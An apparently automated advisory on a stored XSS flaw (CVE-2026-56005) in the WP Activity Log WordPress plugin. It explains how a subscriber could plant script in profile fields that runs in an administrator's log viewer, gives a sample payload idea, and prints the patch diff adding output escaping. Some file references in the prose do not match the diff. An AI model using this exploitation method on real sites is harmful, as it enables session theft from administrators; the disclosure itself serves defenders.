Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : June 25, 2026

CVE-2026-56005: WP Activity Log <= 5.6.3.1 Authenticated (Subscriber+) Stored Cross-Site Scripting PoC, Patch Analysis & Rule

CVE ID CVE-2026-56005

Plugin wp-security-audit-log

Severity Medium (CVSS 6.4)

CWE 79

Vulnerable Version 5.6.3.1

Patched Version 5.6.4

Disclosed June 18, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-56005: Vulnerability in the WP Activity Log plugin for WordPress allows authenticated attackers with subscriber-level access or above to inject stored cross-site scripting (XSS). The plugin versions up to and including 5.6.3.1 are affected. The CVSS score is 6.4, indicating medium severity.

The root cause lies in insufficient input sanitization and output escaping in multiple components. Specifically, the code diff shows that in the file `wp-security-audit-log/classes/Helpers/class-user-utils.php` at lines 172-189, the function `get_tooltip_user_content()` renders user properties (username, first name, last name, email, nickname) directly into a tooltip HTML string using `
` line breaks. The patch wraps these values with `esc_html()` before output. Also, in `wp-security-audit-log/classes/Views/AuditLog.php` around line 634, the code constructs a user HTML link including `data-darktooltip` attribute containing the tooltip content; prior to the patch, user data like `$user->user_login` was not escaped. Additionally, in `wp-security-audit-log/classes/MainWPAddon/class-mainwp-helper.php`, the function `get_tooltip_user_content()` (line 875+) also lacked escaping for display_name when building the tooltip.

Exploitation: An authenticated attacker with subscriber-level privileges can modify their own user profile fields (e.g., first name, last name, nickname) to contain malicious JavaScript payloads. Alternatively, they could inject payloads via user registration if enabled. When the WP Activity Log plugin renders the activity log viewer, the tooltip content includes the attacker’s user details. The crafted payload is stored in the user meta and later rendered unsanitized in the tooltip HTML. The injection point is the `data-darktooltip` attribute of the anchor tag generated in `ListEvents.php` (line 634). By setting a user’s display name to something like `alert(1)`, the payload would execute when an administrator or other user hovers over the affected entry in the log viewer.

The patch adds output escaping using `esc_html()` around all user data fields (`$user->data->user_login`, first_name, last_name, user_email, user_nicename) in `class-user-utils.php` and `class-mainwp-helper.php`. Additionally, in `class-alert.php`, new free version ad links are introduced but these are unrelated to the XSS fix. The patch also applies `wp_kses_post()` to the filter output `wsal_additional_user_tooltip_content` to prevent malicious HTML in that hook. The key change is that untrusted user data is now properly HTML-escaped before being inserted into the tooltip attribute.

If exploited, this vulnerability allows an attacker to execute arbitrary JavaScript in the browser of any user viewing the activity log. This can lead to session hijacking, data theft (including cookies and sensitive page content), defacement, or redirection to malicious sites. Since the log viewer is commonly accessed by administrators, the attack can target high-privilege users. The stored XSS persists until the malicious user data is removed or the profile is corrected, making it a persistent threat.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/wp-security-audit-log/classes/Controllers/class-alert-manager.php
+++ b/wp-security-audit-log/classes/Controllers/class-alert-manager.php
@@ -1362,6 +1362,8 @@
 					'denied'       => esc_html__( 'Denied', 'wp-security-audit-log' ),
 					'available'    => esc_html__( 'Available', 'wp-security-audit-log' ),
 					'completed'    => esc_html__( 'Completed', 'wp-security-audit-log' ),
+					'connected'    => esc_html__( 'Connected', 'wp-security-audit-log' ),
+					'disconnected' => esc_html__( 'Disconnected', 'wp-security-audit-log' ),
 				);
 				// sort the types alphabetically.
 				asort( self::$event_types );
--- a/wp-security-audit-log/classes/Controllers/class-alert.php
+++ b/wp-security-audit-log/classes/Controllers/class-alert.php
@@ -482,10 +482,91 @@
 				unset( $link_label );
 			}

+			// @free:start
+			$result = self::add_free_version_additional_links( $result, $alert );
+			// @free:end
+
+			return $result;
+		}
+
+		// @free:start
+		/**
+		 * Adds the free version additional links for the alert.
+		 *
+		 * @param array $result - The link collection.
+		 * @param array $alert - The alert data.
+		 *
+		 * @return array $result - The link collection.
+		 * @since 5.6.4
+		 */
+		private static function add_free_version_additional_links( array $result, array $alert ): array {
+			$alert_id = (int) ( $alert['code'] ?? 0 );
+
+			if ( 0 >= $alert_id ) {
+				return $result;
+			}
+
+			$free_version_additional_links = self::get_free_version_viewer_additional_links();
+
+			$hook_additional_links = (array) apply_filters( 'wsal_free_additional_event_links', array() );
+
+			foreach ( $hook_additional_links as $event_id => $link_labels ) {
+				foreach ( (array) $link_labels as $link_label ) {
+					$free_version_additional_links[ (int) $event_id ][] = (string) $link_label;
+				}
+			}
+
+			if ( ! isset( $free_version_additional_links[ $alert_id ] ) ) {
+				return $result;
+			}
+
+			foreach ( (array) $free_version_additional_links[ $alert_id ] as $link_label ) {
+				$link_url              = 'https://melapress.com/wordpress-activity-log/pricing/?utm_source=plugin&utm_medium=wsal&utm_campaign=viewer-cta-' . $alert_id;
+				$result[ $link_label ] = array(
+					'url'              => $link_url,
+					'needs_formatting' => true,
+					'title'            => $link_label,
+					'label'            => $link_label,
+				);
+			}
+
 			return $result;
 		}

 		/**
+		 * Returns the free version additional links shown in the log viewer.
+		 *
+		 * Each entry maps an event ID to one or more link labels.
+		 *
+		 * @return array $links - Map of event ID to link labels.
+		 *
+		 * @since 5.6.4
+		 */
+		private static function get_free_version_viewer_additional_links(): array {
+			$alerts_link_label   = esc_html__( 'Get instant alerts for events like this with Premium', 'wp-security-audit-log' );
+			$sessions_link_label = esc_html__( 'Monitor and manage active user sessions with Premium', 'wp-security-audit-log' );
+
+			return array(
+				/**
+				 * General events.
+				 */
+				1004 => array( $alerts_link_label ),
+				4002 => array( $alerts_link_label ),
+				4008 => array( $alerts_link_label ),
+				4025 => array( $alerts_link_label ),
+				6004 => array( $alerts_link_label ),
+				/**
+				 * Session management-related events.
+				 */
+				1000 => array( $sessions_link_label ),
+				1005 => array( $sessions_link_label ),
+				1007 => array( $sessions_link_label ),
+				1009 => array( $sessions_link_label ),
+			);
+		}
+		// @free:end
+
+		/**
 		 * Gets the post revision link title.
 		 *
 		 * @return string $title - Post revision link title.
--- a/wp-security-audit-log/classes/Entities/class-occurrences-entity.php
+++ b/wp-security-audit-log/classes/Entities/class-occurrences-entity.php
@@ -468,7 +468,8 @@
 			}

 			// Check if the meta is part of the occurrences table.
-			if ( in_array( $name, array_keys( self::$migrated_meta ), true ) ) {
+			$is_migrated_meta = in_array( $name, array_keys( self::$migrated_meta ), true );
+			if ( $is_migrated_meta ) {
 				$property_name = self::$migrated_meta[ $name ];
 				if ( isset( $data_collected[ $property_name ] ) ) {
 					$result = $data_collected[ $property_name ];
@@ -483,7 +484,10 @@
 				$result = $meta['value'];
 			}

-			$result = maybe_unserialize( $result );
+			if ( ! $is_migrated_meta ) {
+				$result = maybe_unserialize( $result );
+			}
+
 			if ( 'CurrentUserRoles' === $name && is_string( $result ) ) {
 				$result = preg_replace( '/[[]"]/', '', $result );
 				$result = explode( ',', $result );
@@ -659,10 +663,13 @@

 			$sql = 'SELECT DISTINCT client_ip FROM ' . self::get_table_name();
 			if ( ! empty( $search ) ) {
-				$sql .= ' WHERE 1 AND client_ip LIKE "%' . $_wpdb->esc_like( $search ) . '%"';
+				$sql .= $_wpdb->prepare( ' WHERE client_ip LIKE %s', '%' . $_wpdb->esc_like( $search ) . '%' );
 			}
 			if ( ! is_null( $limit ) ) {
-				$sql .= ' LIMIT ' . $limit;
+				$limit = absint( $limit );
+				if ( 0 < $limit ) {
+					$sql .= ' LIMIT ' . $limit;
+				}
 			}
 			$ips    = $_wpdb->get_col( $sql );
 			$result = array();
@@ -701,7 +708,7 @@
 						}

 						foreach ( self::$migrated_meta as $name => $new_name ) {
-							$prepared_array[ $result_row[ $table_name . 'id' ] ]['meta_values'][ $name ] = maybe_unserialize( $result_row[ $table_name . $new_name ] );
+							$prepared_array[ $result_row[ $table_name . 'id' ] ]['meta_values'][ $name ] = $result_row[ $table_name . $new_name ];
 						}
 					}

--- a/wp-security-audit-log/classes/Free/assets/nav-bar.php
+++ b/wp-security-audit-log/classes/Free/assets/nav-bar.php
@@ -227,11 +227,24 @@
 <?php
 global $current_screen;

-$log_viewer = ( in_array( $current_screen->base, array( 'toplevel_page_wsal-auditlog', 'toplevel_page_wsal-auditlog-network' ), true ) ) ? 'active' : '';
-$settings   = ( in_array( $current_screen->base, array( 'wp-activity-log_page_wsal-settings', 'wp-activity-log_page_wsal-settings-network' ), true ) ) ? 'active' : '';
-$toggle     = ( in_array( $current_screen->base, array( 'wp-activity-log_page_wsal-togglealerts', 'wp-activity-log_page_wsal-togglealerts-network' ), true ) ) ? 'active' : '';
-$help       = ( in_array( $current_screen->base, array( 'wp-activity-log_page_wsal-help', 'wp-activity-log_page_wsal-help-network' ), true ) ) ? 'active' : '';
-$notifications       = ( in_array( $current_screen->base, array( 'wp-activity-log_page_wsal-notifications', 'wp-activity-log_page_wsal-notifications-network' ), true ) ) ? 'active' : '';
+$log_viewer    = ( in_array( $current_screen->base, array( 'toplevel_page_wsal-auditlog', 'toplevel_page_wsal-auditlog-network' ), true ) ) ? 'active' : '';
+$settings      = ( in_array( $current_screen->base, array( 'wp-activity-log_page_wsal-settings', 'wp-activity-log_page_wsal-settings-network' ), true ) ) ? 'active' : '';
+$toggle        = ( in_array( $current_screen->base, array( 'wp-activity-log_page_wsal-togglealerts', 'wp-activity-log_page_wsal-togglealerts-network' ), true ) ) ? 'active' : '';
+$help          = ( in_array( $current_screen->base, array( 'wp-activity-log_page_wsal-help', 'wp-activity-log_page_wsal-help-network' ), true ) ) ? 'active' : '';
+$notifications = ( in_array( $current_screen->base, array( 'wp-activity-log_page_wsal-notifications', 'wp-activity-log_page_wsal-notifications-network' ), true ) ) ? 'active' : '';
+$cta_text      = __( 'Unlock extra features with WP Activity Log Premium', 'wp-security-audit-log' );
+
+if ( in_array( $current_screen->base, array( 'toplevel_page_wsal-auditlog', 'toplevel_page_wsal-auditlog-network' ), true ) ) {
+	$cta_text = __( 'Unlock Advanced Search & Filtering with Premium', 'wp-security-audit-log' );
+} elseif ( in_array( $current_screen->base, array( 'wp-activity-log_page_wsal-notifications', 'wp-activity-log_page_wsal-notifications-network' ), true ) ) {
+	$cta_text = __( 'Unlock Automated Reports & Alerts with Premium', 'wp-security-audit-log' );
+} elseif ( in_array( $current_screen->base, array( 'wp-activity-log_page_wsal-settings', 'wp-activity-log_page_wsal-settings-network' ), true ) ) {
+	$cta_text = __( 'Unlock User Session Management with Premium', 'wp-security-audit-log' );
+} elseif ( in_array( $current_screen->base, array( 'wp-activity-log_page_wsal-togglealerts', 'wp-activity-log_page_wsal-togglealerts-network' ), true ) ) {
+	$cta_text = __( 'Unlock More Logged Events with Premium', 'wp-security-audit-log' );
+} elseif ( in_array( $current_screen->base, array( 'wp-activity-log_page_wsal-help', 'wp-activity-log_page_wsal-help-network' ), true ) ) {
+	$cta_text = __( 'Unlock Priority Support with Premium', 'wp-security-audit-log' );
+}
 ?>

 <nav id="wsal-navbar">
@@ -313,7 +326,7 @@
 		</ul>
 		<ul class="wsal-nav-right wsal-nav-list">
 			<li class="wsal-nav-item">
-				<a href="https://melapress.com/wordpress-activity-log/pricing/?utm_source=plugin&utm_medium=wsal&utm_campaign=header-upgrade-banner" target="_blank" class="wsal-nav-link cta-link"><?php echo esc_html__( 'Unlock extra features with WP Activity Log Premium', 'wp-security-audit-log' ); ?></a>
+				<a href="https://melapress.com/wordpress-activity-log/pricing/?utm_source=plugin&utm_medium=wsal&utm_campaign=header-upgrade-banner" target="_blank" class="wsal-nav-link cta-link"><?php echo esc_html( $cta_text ); ?></a>
 			</li>
 		</ul>
 	</div>
--- a/wp-security-audit-log/classes/Helpers/class-user-utils.php
+++ b/wp-security-audit-log/classes/Helpers/class-user-utils.php
@@ -169,11 +169,11 @@
 				return '';
 			}

-			$tooltip  = '<strong>' . esc_attr__( 'Username: ', 'wp-security-audit-log' ) . '</strong>' . $user->data->user_login . '</br>';
-			$tooltip .= ( ! empty( $user->data->first_name ) ) ? '<strong>' . esc_attr__( 'First name: ', 'wp-security-audit-log' ) . '</strong>' . $user->data->first_name . '</br>' : '';
-			$tooltip .= ( ! empty( $user->data->last_name ) ) ? '<strong>' . esc_attr__( 'Last Name: ', 'wp-security-audit-log' ) . '</strong>' . $user->data->last_name . '</br>' : '';
-			$tooltip .= '<strong>' . esc_attr__( 'Email: ', 'wp-security-audit-log' ) . '</strong>' . $user->data->user_email . '</br>';
-			$tooltip .= '<strong>' . esc_attr__( 'Nickname: ', 'wp-security-audit-log' ) . '</strong>' . $user->data->user_nicename . '</br></br>';
+			$tooltip  = '<strong>' . esc_attr__( 'Username: ', 'wp-security-audit-log' ) . '</strong>' . esc_html( $user->data->user_login ) . '</br>';
+			$tooltip .= ( ! empty( $user->data->first_name ) ) ? '<strong>' . esc_attr__( 'First name: ', 'wp-security-audit-log' ) . '</strong>' . esc_html( $user->data->first_name ) . '</br>' : '';
+			$tooltip .= ( ! empty( $user->data->last_name ) ) ? '<strong>' . esc_attr__( 'Last Name: ', 'wp-security-audit-log' ) . '</strong>' . esc_html( $user->data->last_name ) . '</br>' : '';
+			$tooltip .= '<strong>' . esc_attr__( 'Email: ', 'wp-security-audit-log' ) . '</strong>' . esc_html( $user->data->user_email ) . '</br>';
+			$tooltip .= '<strong>' . esc_attr__( 'Nickname: ', 'wp-security-audit-log' ) . '</strong>' . esc_html( $user->data->user_nicename ) . '</br></br>';

 			/**
 			 * WSAL Filter: `wsal_additional_user_tooltip_content'
@@ -185,7 +185,7 @@
 			 * @param string $content Blank string to append to.
 			 * @param object  $user  - User object.
 			 */
-			$additional_content = apply_filters( 'wsal_additional_user_tooltip_content', '', $user );
+			$additional_content = wp_kses_post( (string) apply_filters( 'wsal_additional_user_tooltip_content', '', $user ) );

 			$tooltip .= $additional_content;

--- a/wp-security-audit-log/classes/Helpers/class-view-manager.php
+++ b/wp-security-audit-log/classes/Helpers/class-view-manager.php
@@ -127,7 +127,6 @@


 			add_action( 'admin_head', array( __CLASS__, 'hide_freemius_sites_section' ) );
-			add_action( 'admin_head', array( __CLASS__, 'print_menu_badge_style' ) );

 			// Check if WFCM is running by seeing if we have the version defined.
 			if ( defined( 'WFCM_VERSION' ) && ( version_compare( WFCM_VERSION, '1.6.0', '<' ) ) ) {
@@ -216,7 +215,7 @@
 					array( self::$views[0], 'set_hook_suffix' ),
 					add_menu_page(
 						'WP Activity Log',
-						'WP Activity Log' . self::get_updates_count_html(),
+						'WP Activity Log',
 						'read', // No capability requirement.
 						$main_view_menu_slug,
 						array( __CLASS__, 'render_view_body' ),
@@ -273,7 +272,7 @@
 				add_submenu_page(
 					'wsal-auditlog',
 					'Upgrade',
-					'<span class="fs-submenu-item wp-security-audit-log pricing upgrade-mode" style="color:#FF8977;">Upgrade to Premium</span>',
+					'<span class="fs-submenu-item wp-security-audit-log pricing upgrade-mode" style="display: block; margin: 6px 10px 4px 0; padding: 8px 12px; border-radius: 5px; border: 1px solid #009344; background: linear-gradient(180deg, rgba(248, 231, 28, 0.20) 0%, rgba(56, 74, 47, 0.20) 100%), #009344; color: #fff; line-height: 1; text-align: center; font-size: 14px; font-weight: 600;">Upgrade</span>',
 					'read', // No capability requirement.
 					'upgrade',
 					array(),
@@ -284,57 +283,6 @@
 		}

 		/**
-		 * Returns the badge HTML appended to the WP Activity Log top-level menu title.
-		 *
-		 * @return string
-		 *
-		 * @since 5.2.2
-		 */
-		public static function get_updates_count_html(): string {
-			$count = Notices::get_number_of_notices();
-
-			if ( 0 >= $count ) {
-				return '';
-			}
-
-			return sprintf(
-				' <span id="wsal-notices-menu" class="update-plugins"><span class="update-count">%s</span></span>',
-				esc_html( number_format_i18n( $count ) )
-			);
-		}
-
-		/**
-		 * Prints the inline <style> block that styles the menu badge.
-		 *
-		 * @return void
-		 *
-		 * @since 6.0.0
-		 */
-		public static function print_menu_badge_style() {
-			if ( 0 >= Notices::get_number_of_notices() ) {
-				return;
-			}
-
-			echo '<style>
-				#wsal-notices-menu .update-count {
-					position: absolute;
-					top: 2px;
-					right: 6px;
-					min-width: 20px;
-					line-height: 20px;
-					background: #d63638;
-					border-radius: 50%;
-					font-weight: bold;
-				}
-
-				#adminmenu #wsal-notices-menu.update-plugins {
-					display: inline;
-					background: none;
-				}
-			</style>';
-		}
-
-		/**
 		 * WordPress Filter
 		 *
 		 * @param array $old_links - Array of old links.
--- a/wp-security-audit-log/classes/Helpers/settings/class-settings-builder.php
+++ b/wp-security-audit-log/classes/Helpers/settings/class-settings-builder.php
@@ -806,7 +806,7 @@
 		 *
 		 * @return void
 		 *
-		 * @since 6.0.0
+		 * @since 5.6.3
 		 */
 		private static function active_constant_notice() {
 			if ( Credential_Settings_Helper::has_active_constant( self::$item_id ) ) {
--- a/wp-security-audit-log/classes/ListAdminEvents/class-list-events.php
+++ b/wp-security-audit-log/classes/ListAdminEvents/class-list-events.php
@@ -180,7 +180,8 @@
 						echo '<div style="clear:both; float:right">';
 						$this->search_box(
 							__( 'Search', 'wp-security-audit-log' ),
-							strtolower( $this->table_name ) . '-find'
+							strtolower( $this->table_name ) . '-find',
+							true
 						);
 						echo '</div>';
 					}
@@ -204,12 +205,16 @@
 		/**
 		 * Displays the search box.
 		 *
-		 * @since 4.6.0
+		 * @param string $text - The 'submit' button label.
+		 * @param string $input_id - ID attribute value for the search input field.
+		 * @param bool   $show_search_cta - Whether to show the search CTA helper text.
+		 *
+		 * @return void - Outputs the search box markup.
 		 *
-		 * @param string $text     The 'submit' button label.
-		 * @param string $input_id ID attribute value for the search input field.
+		 * @since 4.6.0
+		 * @since 5.6.4 Added the $show_search_cta parameter.
 		 */
-		public function search_box( $text, $input_id ) {
+		public function search_box( $text, $input_id, $show_search_cta = false ) {
 			// phpcs:ignore WordPress.Security.NonceVerification.Recommended -- Read-only display parameter, sanitized before use.
 			if ( empty( $_GET['s'] ) && ! $this->has_items() ) {
 				return;
@@ -234,11 +239,26 @@
 				echo '<input type="hidden" name="detached" value="' . esc_attr( sanitize_text_field( wp_unslash( $_GET['detached'] ) ) ) . '" />'; // phpcs:ignore WordPress.Security.NonceVerification.Recommended
 			}
 			?>
-	<p class="search-box" style="position:relative">
-		<label class="screen-reader-text" for="<?php echo esc_attr( $input_id ); ?>"><?php echo esc_attr( $text ); ?>:</label>
-					<input type="search" id="<?php echo esc_attr( $input_id ); ?>" class="wsal_search_input" name="s" value="<?php _admin_search_query(); ?>" />
-			<?php submit_button( $text, '', '', false, array( 'id' => 'search-submit' ) ); ?>
-	</p>
+			<p class="search-box" style="position:relative">
+				<label class="screen-reader-text" for="<?php echo esc_attr( $input_id ); ?>"><?php echo esc_attr( $text ); ?>:</label>
+					<?php
+					// @free:start
+					if ( $show_search_cta ) {
+						?>
+						<span class="wsal-search-helper-text">
+							<span class="dashicons dashicons-info" aria-hidden="true"></span>
+							<span><?php esc_html_e( 'Quickly find the exact log data you need with advanced filters and saved searches with', 'wp-security-audit-log' ); ?>
+							<a href="<?php echo esc_url( 'https://melapress.com/wordpress-activity-log/pricing/?utm_source=plugin&utm_medium=wsal&utm_campaign=audit-log-search-helper' ); ?>" target="_blank" rel="noopener noreferrer"><?php esc_html_e( 'Premium', 'wp-security-audit-log' ); ?></a></span>
+						</span>
+						<?php
+					}
+					// @free:end
+					?>
+					<span class="wsal-search-controls">
+						<input type="search" id="<?php echo esc_attr( $input_id ); ?>" class="wsal_search_input" name="s" value="<?php _admin_search_query(); ?>" />
+						<?php submit_button( $text, '', '', false, array( 'id' => 'search-submit' ) ); ?>
+					</span>
+			</p>
 			<?php
 		}

@@ -612,7 +632,7 @@
 						// Additional user info tooltip.
 						$tooltip = User_Utils::get_tooltip_user_content( $user );

-						$uhtml = '<a class="tooltip" data-darktooltip="' . esc_attr( $tooltip ) . '" data-user="' . $user->user_login . '" href="' . $user_edit_link . '" target="_blank">' . esc_html( $display_name ) . '</a>';
+						$uhtml = '<a class="tooltip" data-darktooltip="' . esc_attr( $tooltip ) . '" data-user="' . esc_attr( $user->user_login ) . '" href="' . esc_url( $user_edit_link ) . '" target="_blank">' . esc_html( $display_name ) . '</a>';


 						$roles = User_Utils::get_roles_label( $item['user_roles'] );
@@ -1099,6 +1119,8 @@
 		 * Table navigation.
 		 *
 		 * @param string $which - Position of the nav.
+		 *
+		 * @since 5.6.4 - CSV export button now passes a server-side export token instead of a serialized query.
 		 */
 		public function extra_tablenav( $which ) {
 			// If the position is not top then render.
--- a/wp-security-audit-log/classes/MainWPAddon/class-mainwp-helper.php
+++ b/wp-security-audit-log/classes/MainWPAddon/class-mainwp-helper.php
@@ -66,7 +66,7 @@
 		 */
 		public static function init() {
 			add_action( 'wsal_list_view_top_navigation', array( __CLASS__, 'show_top_navigation' ) );
-			add_action( 'wp_ajax_retrieve_events_manually', array( __CLASS__, 'retrieve_events_manually' ) );
+			add_action( 'wp_ajax_retrieve_events_manually', array( __CLASS__, 'ajax_retrieve_events_manually' ) );

 			add_filter( 'wsal_get_user_image', array( __CLASS__, 'get_user_image' ), 10, 2 );
 			add_filter( 'wsal_get_user_html', array( __CLASS__, 'get_user_html' ), 10, 2 );
@@ -153,7 +153,9 @@
 						}
 						?>
 					</select>
-					<input type="button" class="button" id="mwpal-wsal-manual-retrieve" value="<?php esc_html_e( 'Retrieve Activity Logs Now', 'wp-security-audit-log' ); ?>" />
+					<?php if ( Settings_Helper::current_user_can( 'edit' ) ) : ?>
+						<input type="button" class="button" id="mwpal-wsal-manual-retrieve" value="<?php esc_html_e( 'Retrieve Activity Logs Now', 'wp-security-audit-log' ); ?>" />
+					<?php endif; ?>
 				</div>
 				<script>
 					jQuery( document ).ready( function() {
@@ -193,6 +195,27 @@
 		}

 		/**
+		 * AJAX callback for manually retrieving events from MainWP child sites.
+		 *
+		 * @return void
+		 *
+		 * @since 5.6.4
+		 */
+		public static function ajax_retrieve_events_manually() {
+			if ( ! isset( $_POST['nonce'] ) || false === wp_verify_nonce( sanitize_text_field( wp_unslash( $_POST['nonce'] ) ), 'wsal-notifications-script-nonce' ) ) {
+				wp_send_json_error( new WP_Error( 'invalid_nonce', esc_html__( 'Insecure request.', 'wp-security-audit-log' ) ), 403 );
+			}
+
+			if ( ! Settings_Helper::current_user_can( 'edit' ) ) {
+				wp_send_json_error( new WP_Error( 'access_denied', esc_html__( 'Access denied.', 'wp-security-audit-log' ) ), 403 );
+			}
+
+			self::retrieve_events_manually();
+
+			wp_send_json_success();
+		}
+
+		/**
 		 * Delete Events from Child Sites.
 		 *
 		 * @since 5.0.0
@@ -585,7 +608,7 @@

 							$tooltip = self::get_tooltip_user_content( $item_data['meta_values']['UserData'] );

-							$uhtml = '<a class="tooltip" data-darktooltip="' . esc_attr( $tooltip ) . '" data-user="' . $item_data['meta_values']['UserData']['display_name'] . '" href="' . $user_url . '" target="_blank">' . esc_html( self::get_display_label( $item_data['meta_values']['UserData'] ) ) . '</a>';
+							$uhtml = '<a class="tooltip" data-darktooltip="' . esc_attr( $tooltip ) . '" data-user="' . esc_attr( $item_data['meta_values']['UserData']['display_name'] ) . '" href="' . esc_url( $user_url ) . '" target="_blank">' . esc_html( self::get_display_label( $item_data['meta_values']['UserData'] ) ) . '</a>';
 						}
 					}
 				}
@@ -852,11 +875,11 @@
 		 */
 		private static function get_tooltip_user_content( array $user_data ) {

-			$tooltip  = '<strong>' . esc_attr__( 'Username: ', 'wp-security-audit-log' ) . '</strong>' . $user_data['display_name'] . '</br>';
-			$tooltip .= ( ! empty( $user_data['first_name'] ) ) ? '<strong>' . esc_attr__( 'First name: ', 'wp-security-audit-log' ) . '</strong>' . $user_data['first_name'] . '</br>' : '';
-			$tooltip .= ( ! empty( $user_data['last_name'] ) ) ? '<strong>' . esc_attr__( 'Last Name: ', 'wp-security-audit-log' ) . '</strong>' . $user_data['last_name'] . '</br>' : '';
-			$tooltip .= '<strong>' . esc_attr__( 'Email: ', 'wp-security-audit-log' ) . '</strong>' . $user_data['user_email'] . '</br>';
-			$tooltip .= '<strong>' . esc_attr__( 'Nickname: ', 'wp-security-audit-log' ) . '</strong>' . $user_data['user_nicename'] . '</br></br>';
+			$tooltip  = '<strong>' . esc_attr__( 'Username: ', 'wp-security-audit-log' ) . '</strong>' . esc_html( $user_data['display_name'] ) . '</br>';
+			$tooltip .= ( ! empty( $user_data['first_name'] ) ) ? '<strong>' . esc_attr__( 'First name: ', 'wp-security-audit-log' ) . '</strong>' . esc_html( $user_data['first_name'] ) . '</br>' : '';
+			$tooltip .= ( ! empty( $user_data['last_name'] ) ) ? '<strong>' . esc_attr__( 'Last Name: ', 'wp-security-audit-log' ) . '</strong>' . esc_html( $user_data['last_name'] ) . '</br>' : '';
+			$tooltip .= '<strong>' . esc_attr__( 'Email: ', 'wp-security-audit-log' ) . '</strong>' . esc_html( $user_data['user_email'] ) . '</br>';
+			$tooltip .= '<strong>' . esc_attr__( 'Nickname: ', 'wp-security-audit-log' ) . '</strong>' . esc_html( $user_data['user_nicename'] ) . '</br></br>';

 			/**
 			 * WSAL Filter: `wsal_additional_user_tooltip_content'
@@ -868,7 +891,7 @@
 			 * @param string $content Blank string to append to.
 			 * @param object  $user  - User data array.
 			 */
-			$additional_content = apply_filters( 'wsal_additional_user_tooltip_content', '', $user_data );
+			$additional_content = wp_kses_post( (string) apply_filters( 'wsal_additional_user_tooltip_content', '', $user_data ) );

 			$tooltip .= $additional_content;

--- a/wp-security-audit-log/classes/Views/AuditLog.php
+++ b/wp-security-audit-log/classes/Views/AuditLog.php
@@ -46,15 +46,6 @@
 	protected $version;

 	/**
-	 * WSAL Adverts.
-	 *
-	 * @since 3.2.4
-	 *
-	 * @var array
-	 */
-	private $adverts;
-
-	/**
 	 * Audit Log View Arguments.
 	 *
 	 * @since 3.3.1.1
@@ -81,13 +72,16 @@
 		add_action( 'wp_ajax_AjaxSearchSite', array( $this, 'ajax_search_site' ) );
 		add_action( 'wp_ajax_AjaxSwitchDB', array( $this, 'ajax_switch_db' ) );
 		add_action( 'wp_ajax_wsal_download_failed_login_log', array( $this, 'wsal_download_failed_login_log' ) );
-		add_action( 'wp_ajax_wsal_freemius_opt_in', array( $this, 'wsal_freemius_opt_in' ) );
 		add_action( 'wp_ajax_wsal_dismiss_setup_modal', array( __CLASS__, 'dismiss_setup_modal' ) );
 		// add_action( 'wp_ajax_wsal_dismiss_notice_addon_available', array( $this, 'dismiss_notice_addon_available' ) );
 		add_action( 'wp_ajax_wsal_dismiss_missing_aws_sdk_nudge', array( $this, 'dismiss_missing_aws_sdk_nudge' ) );
 		add_action( 'wp_ajax_wsal_dismiss_helper_plugin_needed_nudge', array( $this, 'dismiss_helper_plugin_needed_nudge' ) );
 		add_action( 'wp_ajax_wsal_dismiss_wp_pointer', array( __CLASS__, 'dismiss_wp_pointer' ) );

+		// @free:start
+		add_action( 'wsal_inspector_after_meta', array( __CLASS__, 'render_free_inspector_additional_links' ), 10, 1 );
+		// @free:end
+
 		add_action( 'all_admin_notices', array( 'WSALHelpersNotices', 'init' ) );

 		add_action( 'all_admin_notices', array( $this, 'admin_notices' ) );
@@ -108,128 +102,17 @@

 		// Check plugin version for to dismiss the notice only until upgrade.
 		$this->version = WSAL_VERSION;
-
-		// Set adverts array.
-		$this->adverts = array(
-			// 0 => array(
-			// 'head' => esc_html__( 'Upgrade to Premium and enable search filters so you can find the events you need within seconds, get notified via email or SMS about critical website changes, see who is logged-in to your website in real time, manage user sessions, create detailed reports, and much more!', 'wp-security-audit-log' ),
-			// 'desc' => esc_html__( '', 'wp-security-audit-log' ),
-			// ),
-			1 => array(
-				'head' => esc_html__( 'Instant SMS & email alerts, search & filters, reports, users sessions management and much more!', 'wp-security-audit-log' ),
-				'desc' => esc_html__( 'Upgrade to premium to get more out of your activity logs!', 'wp-security-audit-log' ),
-			),
-			2 => array(
-				'head' => esc_html__( 'See who logged in on your site in real-time, generate reports, get SMS & email alerts of critical changes and more!', 'wp-security-audit-log' ),
-				'desc' => esc_html__( 'Unlock these and other powerful features with WP Activity Log Premium.', 'wp-security-audit-log' ),
-			),
-		);
 	}

 	/**
 	 * Add premium extensions notice.
 	 *
 	 * Notices:
-	 *   1. Plugin advert.
-	 *   2. DB disconnection notice.
-	 *   3. Freemius opt-in/out notice.
+	 *   1. DB disconnection notice.
 	 */
 	public function admin_notices() {
 		$is_current_view = View_Manager::get_active_view() == $this; // phpcs:ignore

-		// Check if any of the extensions are activated.
-		if (
-			! class_exists( 'WSAL_Ext_Plugin' )
-			&& ! class_exists( 'WSAL_SearchExtension' )
-			&& ! class_exists( 'WSAL_UserSessions_Plugin' )
-			&& ( 'anonymous' === WSALHelpersSettings_Helper::get_option_value( 'freemius_state', 'anonymous' ) || // Anonymous mode option.
-			'skipped' === WSALHelpersSettings_Helper::get_option_value( 'freemius_state', 'anonymous' ) )
-		) {
-			$wsal_premium_advert = WSALHelpersSettings_Helper::get_option_value( 'premium-advert', false ); // Get the advert to display.
-			$wsal_premium_advert = false !== $wsal_premium_advert ? (int) $wsal_premium_advert : 0; // Set the default.
-
-			$more_info = add_query_arg(
-				array(
-					'utm_source'   => 'plugin',
-					'utm_medium'   => 'banner',
-					'utm_campaign' => 'wsal',
-					'utm_content'  => 'tell+me+more',
-				),
-				'https://melapress.com/features/'
-			);
-
-			if ( current_user_can( 'manage_options' ) && $is_current_view ) :
-
-				/*
-				?>
-				<div class="updated wsal_notice">
-					<div class="wsal_notice__wrapper">
-						<div class="wsal_notice__content">
-							<img src="<?php echo esc_url( WSAL_BASE_URL ); ?>img/wsal-logo@2x.png">
-							<p>
-								<strong><?php echo isset( $this->adverts[ $wsal_premium_advert ]['head'] ) ? esc_html( $this->adverts[ $wsal_premium_advert ]['head'] ) : false; ?></strong><br>
